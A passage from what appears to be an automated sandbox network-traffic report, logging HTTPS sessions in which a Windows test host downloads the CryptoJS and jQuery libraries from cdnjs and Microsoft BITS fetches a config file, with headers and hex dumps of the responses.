                                                                                                                                                                                                                                              Expires: Thu, 18 Sep 2025 01:15:57 GMT
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2Bp4bgVjFOaQTQ5iba14Ipw0uBFroMAjWlnWIEo%2FiHSVBF8bVJx1%2FptEwnvPSTdG0ix%2FX2iqb0pVQQzzEErdMZRXKBZc2AprXBGmVhIUwiDztA9fT3gssF4kJXCPFqV09LwogZo4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2a1cd100f8b-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC414INData Raw: 31 35 39 36 0d 0a 2f 2a 0a 43 72 79 70 74 6f 4a 53 20 76 33 2e 31 2e 32 0a 63 6f 64 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 2f 63 72 79 70 74 6f 2d 6a 73 0a 28 63 29 20 32 30 30 39 2d 32 30 31 33 20 62 79 20 4a 65 66 66 20 4d 6f 74 74 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 63 6f 64 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 2f 63 72 79 70 74 6f 2d 6a 73 2f 77 69 6b 69 2f 4c 69 63 65 6e 73 65 0a 2a 2f 0a 76 61 72 20 43 72 79 70 74 6f 4a 53 3d 43 72 79 70 74 6f 4a 53 7c 7c 66 75 6e 63 74 69 6f 6e 28 67 2c 6a 29 7b 76 61 72 20 65 3d 7b 7d 2c 64 3d 65 2e 6c 69 62 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6e 3d 64 2e 42 61 73 65 3d 7b 65 78 74 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6d 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                              Data Ascii: 1596/*CryptoJS v3.1.2code.google.com/p/crypto-js(c) 2009-2013 by Jeff Mott. All rights reserved.code.google.com/p/crypto-js/wiki/License*/var CryptoJS=CryptoJS||function(g,j){var e={},d=e.lib={},m=function(){},n=d.Base={extend:function(a){m.protot
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1369INData Raw: 7d 2c 63 72 65 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 65 78 74 65 6e 64 28 29 3b 61 2e 69 6e 69 74 2e 61 70 70 6c 79 28 61 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 61 7d 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6d 69 78 49 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 63 29 26 26 28 74 68 69 73 5b 63 5d 3d 61 5b 63 5d 29 3b 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 74 6f 53 74 72 69 6e 67 22 29 26 26 28 74 68 69 73 2e 74 6f 53 74 72 69 6e 67 3d 61 2e 74 6f 53 74 72 69 6e 67 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6e 69 74 2e
                                                                                                                                                                                                                                              Data Ascii: },create:function(){var a=this.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1369INData Raw: 76 61 72 20 63 3d 61 2e 77 6f 72 64 73 3b 61 3d 61 2e 73 69 67 42 79 74 65 73 3b 66 6f 72 28 76 61 72 20 62 3d 5b 5d 2c 66 3d 30 3b 66 3c 61 3b 66 2b 2b 29 62 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 63 5b 66 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 38 2a 28 66 25 34 29 26 32 35 35 29 29 3b 72 65 74 75 72 6e 20 62 2e 6a 6f 69 6e 28 22 22 29 7d 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 62 3d 5b 5d 2c 66 3d 30 3b 66 3c 63 3b 66 2b 2b 29 62 5b 66 3e 3e 3e 32 5d 7c 3d 28 61 2e 63 68 61 72 43 6f 64 65 41 74 28 66 29 26 32 35 35 29 3c 3c 32 34 2d 38 2a 28 66 25 34 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 71 2e 69 6e 69 74 28 62 2c 63 29 7d 7d 2c 68 3d 62 2e 55 74
                                                                                                                                                                                                                                              Data Ascii: var c=a.words;a=a.sigBytes;for(var b=[],f=0;f<a;f++)b.push(String.fromCharCode(c[f>>>2]>>>24-8*(f%4)&255));return b.join("")},parse:function(a){for(var c=a.length,b=[],f=0;f<c;f++)b[f>>>2]|=(a.charCodeAt(f)&255)<<24-8*(f%4);return new q.init(b,c)}},h=b.Ut
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1369INData Raw: 6e 69 74 28 64 29 29 2e 66 69 6e 61 6c 69 7a 65 28 62 29 7d 7d 2c 5f 63 72 65 61 74 65 48 6d 61 63 48 65 6c 70 65 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 2c 64 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 77 2e 48 4d 41 43 2e 69 6e 69 74 28 61 2c 0a 64 29 29 2e 66 69 6e 61 6c 69 7a 65 28 62 29 7d 7d 7d 29 3b 76 61 72 20 77 3d 65 2e 61 6c 67 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 7d 28 4d 61 74 68 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 67 3d 43 72 79 70 74 6f 4a 53 2c 6a 3d 67 2e 6c 69 62 2c 65 3d 6a 2e 57 6f 72 64 41 72 72 61 79 2c 64 3d 6a 2e 48 61 73 68 65 72 2c 6d 3d 5b 5d 2c 6a 3d 67 2e 61 6c 67 6f 2e 53 48 41 31 3d 64 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74
                                                                                                                                                                                                                                              Data Ascii: nit(d)).finalize(b)}},_createHmacHelper:function(a){return function(b,d){return(new w.HMAC.init(a,d)).finalize(b)}}});var w=e.algo={};return e}(Math);(function(){var g=CryptoJS,j=g.lib,e=j.WordArray,d=j.Hasher,m=[],j=g.algo.SHA1=d.extend({_doReset:funct
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1013INData Raw: 76 61 72 20 71 3d 74 68 69 73 2e 5f 6f 4b 65 79 3d 64 2e 63 6c 6f 6e 65 28 29 2c 62 3d 74 68 69 73 2e 5f 69 4b 65 79 3d 64 2e 63 6c 6f 6e 65 28 29 2c 6c 3d 71 2e 77 6f 72 64 73 2c 6b 3d 62 2e 77 6f 72 64 73 2c 68 3d 30 3b 68 3c 67 3b 68 2b 2b 29 6c 5b 68 5d 5e 3d 31 35 34 39 35 35 36 38 32 38 2c 6b 5b 68 5d 5e 3d 39 30 39 35 32 32 34 38 36 3b 71 2e 73 69 67 42 79 74 65 73 3d 62 2e 73 69 67 42 79 74 65 73 3d 6e 3b 74 68 69 73 2e 72 65 73 65 74 28 29 7d 2c 72 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 68 61 73 68 65 72 3b 65 2e 72 65 73 65 74 28 29 3b 65 2e 75 70 64 61 74 65 28 74 68 69 73 2e 5f 69 4b 65 79 29 7d 2c 75 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 5f 68 61 73 68 65 72 2e 75 70
                                                                                                                                                                                                                                              Data Ascii: var q=this._oKey=d.clone(),b=this._iKey=d.clone(),l=q.words,k=b.words,h=0;h<g;h++)l[h]^=1549556828,k[h]^=909522486;q.sigBytes=b.sigBytes=n;this.reset()},reset:function(){var e=this._hasher;e.reset();e.update(this._iKey)},update:function(e){this._hasher.up
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              9192.168.2.549724184.28.90.27443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                              Server: ECAcc (lpl/EF67)
                                                                                                                                                                                                                                              X-CID: 11
                                                                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                              X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                              Cache-Control: public, max-age=228545
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:57 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              X-CID: 2


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              10192.168.2.549726104.17.24.144435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC380OUTGET /ajax/libs/jquery/3.6.1/jquery.min.js HTTP/1.1
                                                                                                                                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC925INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:57 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                              ETag: W/"63091225-797c"
                                                                                                                                                                                                                                              Last-Modified: Fri, 26 Aug 2022 18:34:13 GMT
                                                                                                                                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 90400
                                                                                                                                                                                                                                              Expires: Thu, 18 Sep 2025 01:15:57 GMT
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g88YCoxdhGX7UcZXyKEFvbx8cRNfDMqXD3tnhoqaukpS9riz8jiGnjW2G4TGA%2FCuJYo5i6cxNM5P2GmIo2EsbeP8Ai4XRytgRrZ4o6jp411rdHlJKNx%2FrvuPgf1Zxas52hsHk6Ig"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2a3fe897cac-EWR
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC444INData Raw: 33 39 37 39 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                                                                                                                                                                              Data Ascii: 3979/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1369INData Raw: 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 79 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 79 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 76 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 65 2e 6e 6f 64 65 54 79 70 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 2e
                                                                                                                                                                                                                                              Data Ascii: on(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1369INData Raw: 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 30 3c 3d 6e 26 26 6e 3c 74 3f 5b 74 68 69 73 5b 6e 5d 5d 3a 5b 5d 29 7d
                                                                                                                                                                                                                                              Data Ascii: ,even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])}
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1369INData Raw: 61 6b 65 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 70 28 4f 62 6a 65 63 74 28 65 29 29 3f 53 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 75 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 69 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 65 5b 69 2b 2b 5d 3d 74 5b 72 5d 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                              Data Ascii: akeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1369INData Raw: 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c 5d 22 2c 46 3d 22 3a 28 22 2b 49 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 57 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 24 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 2b 22 2c 22 67 22 29 2c 42 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 4d 2b 22 2b 24 22 2c 22 67 22 29 2c 5f 3d 6e 65 77 20 52
                                                                                                                                                                                                                                              Data Ascii: |\"((?:\\\\.|[^\\\\\"])*)\"|("+I+"))|)"+M+"*\\]",F=":("+I+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",$=new RegExp(M+"+","g"),B=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),_=new R
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1369INData Raw: 7d 2c 61 65 3d 62 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 48 2e 61 70 70 6c 79 28 74 3d 4f 2e 63 61 6c 6c 28 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 74 5b 70 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 29 7b 48 3d 7b 61 70 70 6c 79 3a 74 2e 6c 65 6e 67 74 68 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4c 2e 61 70 70 6c 79 28 65 2c 4f 2e 63 61 6c 6c 28
                                                                                                                                                                                                                                              Data Ascii: },ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.length?function(e,t){L.apply(e,O.call(
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1369INData Raw: 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 65 28 65 2c 74 29 7b 76 61
                                                                                                                                                                                                                                              Data Ascii: r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function fe(e,t){va
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1369INData Raw: 20 72 21 3d 43 26 26 39 3d 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 70 21 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 6f 65 2c 21 31 29 3a 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 6f 65 29 29 2c 64 2e 73 63 6f 70 65 3d 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28
                                                                                                                                                                                                                                              Data Ascii: r!=C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=ce(function(e){return a.appendChild(
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1369INData Raw: 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 5b 5d 2c 69 3d 30 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28
                                                                                                                                                                                                                                              Data Ascii: "id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC1369INData Raw: 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 79 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 79 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 64
                                                                                                                                                                                                                                              Data Ascii: pe","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&y.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&y.push(":enabled",":disabled"),a.appendChild(e).disabled=!0,2!==e.querySelectorAll(":d


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              11192.168.2.549728184.28.90.27443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:57 UTC239OUTGET /fs/windows/config.json HTTP/1.1
